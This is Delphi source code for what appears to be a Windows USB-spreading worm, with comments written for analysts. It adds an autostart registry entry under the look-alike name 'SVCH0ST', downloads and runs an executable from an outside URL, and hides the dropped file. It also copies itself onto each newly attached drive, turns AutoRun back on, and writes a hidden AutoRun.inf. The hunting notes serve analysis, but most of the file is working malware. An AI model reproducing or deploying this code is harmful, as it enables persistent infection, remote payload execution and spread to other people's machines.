interface


uses
  Windows, Messages, SysUtils,Forms,IniFiles;
type
  { Main form of the sample. It is never shown (FormCreate clears
    Application.ShowMainForm); all of its work happens in FormCreate and in
    the WM_DEVICECHANGE handler, which reacts to newly attached volumes.
    Summary for analysts: an autostart value named 'SVCH0ST' is written under
    HKEY_LOCAL_MACHINE (see Startup), a payload is downloaded from the Buffer
    URL, and a copy of exefile plus an AutoRun.inf are written to every
    drive that arrives (see WMDeviceChange). }
  TFrm_Main = class(TForm)
  procedure FormCreate(Sender: TObject);   // autostart self-check, otherwise calls Startup
  procedure FormClose(Sender: TObject; var Action: TCloseAction);
  private
  // The 'message' directive routes WM_DEVICECHANGE to this method.
  procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
  public
  { Public declarations }
  end;
const
    // Name of the dropped file. Note the digit zero: a look-alike of svchost.exe,
    // which is a useful hunting string for this sample.
    exefile = 'SVCH0ST.EXE';
    // Download source passed to URLDownloadToFile in Startup.
    Buffer = 'http://www.888.com/hello.exe';
    DBT_DEVICEARRIVAL = $8000;  // system detected a new device (the only event handled below)
    DBT_DEVICEREMOVECOMPLETE = $8004;  // device is gone (declared, not used in this file)
    DBT_DEVTYP_VOLUME = $00000002;  // logical volume
    DBTF_MEDIA = $0001;  // media comings and goings (declared, not used in this file)
type
// Local mirrors of the Win32 DEV_BROADCAST_HDR / DEV_BROADCAST_VOLUME layouts
// that WM_DEVICECHANGE passes in LParam (consumed in WMDeviceChange).
PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
TDEV_BROADCAST_HDR = packed record
  dbch_size : DWORD;
  dbch_devicetype : DWORD;   // compared with DBT_DEVTYP_VOLUME before the cast to the volume record
  dbch_reserved : DWORD;
end;
  PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
  TDEV_BROADCAST_VOLUME = packed record
    dbcv_size : DWORD;
    dbcv_devicetype : DWORD;
    dbcv_reserved : DWORD;
    dbcv_unitmask : DWORD;   // bit n set -> drive letter char(n + 65) is affected
    dbcv_flags : WORD;
  end;


// URLDownloadToFileA imported straight from URLMON.DLL. Startup uses it to
// fetch the Buffer URL into the dropped file's path.
function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
                  StatusCB: Pointer): LongWord;
                  stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';


// WinExec re-declared here instead of being taken from the Windows unit.
// Startup calls it to launch the downloaded file.
function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
            stdcall; external 'kernel32.dll' name 'WinExec';


var
  Frm_Main: TFrm_Main;
  // Full path of the dropped copy; built in FormCreate from the system
  // directory and exefile, then passed to Startup and used by WMDeviceChange.
  exefull:string;
implementation


{$R *.dfm}


{ Creates (or opens) subkey beneath key and stores value there under name as a
  REG_EXPAND_SZ string. Returns True only when RegSetValueEx reports success
  (0); the key handle is closed before returning on every path. }
function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
  result := true;
  RegCloseKey(regkey);
end;


{ Install routine, reached from FormCreate when the autostart self-check
  fails. TheName is the target path of the dropped executable (exefull).
  Observable sequence, in order: an autostart value 'SVCH0ST' -> TheName is
  written under HKEY_LOCAL_MACHINE at the key path literal below; the Buffer
  URL is downloaded to TheName; hidden+system attributes are set on it; a
  message box is shown; the file is launched with WinExec. The three
  commented-out lines presumably were a self-delete step that was never
  finished. }
procedure Startup(var TheName:string);
begin
  SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);   // persistence
  UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);   // payload download
  SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);   // hide the dropped file
  messagebox(0,'文件下载成功!','成功',MB_OK);   // "download succeeded" dialog - a visible artefact of this sample
  WinExec(PChar(TheName), SW_SHOWDEFAULT);   // execute what was downloaded
  //Sleep(500);
  //DeleteMe;
  //freemem(@path,256);
end;


{ WM_DEVICECHANGE handler. Only DBT_DEVICEARRIVAL for a logical volume is
  acted on; there is no other case arm, so removals are ignored. For the
  arriving drive it (1) copies exefull to the drive root as exefile and
  marks it read-only+hidden, (2) writes 0 to the per-user Explorer policy
  value NoDriveTypeAutoRun (the value that normally disables AutoRun by
  drive type - a write of 0 here is a strong detection signal), and
  (3) replaces the drive's AutoRun.inf with an [AutoRun] open=exefile entry,
  also read-only+hidden. }
procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
  lpdb : PDEV_BROADCAST_HDR;
  lpdbv : PDEV_BROADCAST_VOLUME;
  unitmask:DWORD;
  i:integer;
  MyIni:TIniFile;
  s:Hkey;
  value:dword ;
  inifile:string;
begin
  lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
  case Msg.WParam of
  DBT_DEVICEARRIVAL ://a device finished installing


  if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
  begin
    lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
    unitmask:=lpdbv.dbcv_unitmask;//get the device's drive letter (bit mask)
    for i:=0 to 25 do //walk the drive letters; i ends on the lowest set bit
    begin
      if Boolean(unitmask and $1)then//did this drive's state change?
      break;
      unitmask := unitmask shr 1;
    end;
    if fileexists(exefull) then  //copy the file onto the USB drive
    begin
    copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
    FileSetAttr(char(i+65) + ':' + exefile,$00000003);   // $03 = read-only + hidden
    end;
    inifile:=char(i+65)+':AutoRun.inf';//ini file path on the new drive
    // Re-enable AutoRun for every drive type for the current user.
    RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
    value:=0;
    RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
    RegCloseKey(s);
    // Clear attributes first so DeleteFile can remove an existing AutoRun.inf.
    if fileexists(inifile) then
    begin
    FileSetAttr(inifile,$00000000);
    DeleteFile(inifile);
    end;
    // Produces an [AutoRun] section with open=SVCH0ST.EXE.
    MyIni := TIniFile.Create(inifile);
    MyIni.WriteString('AutoRun', 'open',exefile);
    FileSetAttr(inifile,$00000003);   // $03 = read-only + hidden
  end;
end;
end;


{ Startup self-check. Hides the main form, builds exefull from the system
  directory and exefile, then reads the 'SVCH0ST' value from the
  HKEY_LOCAL_MACHINE key path below. If a hard-coded system-directory copy of
  the file exists and the registry value matches exefull (case-insensitive),
  a "autostart succeeded" dialog is shown; otherwise Startup performs the
  install. Both dialogs are leftover visible artefacts of this sample. }
procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
  Application.ShowMainForm:=False;   // never display the window
  getsystemdirectory(path,120);
  exefull := strpas(path) + '' + exefile;
  size:=256;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
  RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
  RegCloseKey(s);
  //file exists and autostart is set
  if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
  messagebox(0,'自启动成功!','成功',MB_OK)
  else
  Startup(exefull);//download-and-execute routine
end;


{ OnClose handler: closing the (hidden) form ends the whole process rather
  than just freeing the form. Sender and Action are not inspected. }
procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  with Application do
    Terminate;
end;


end.

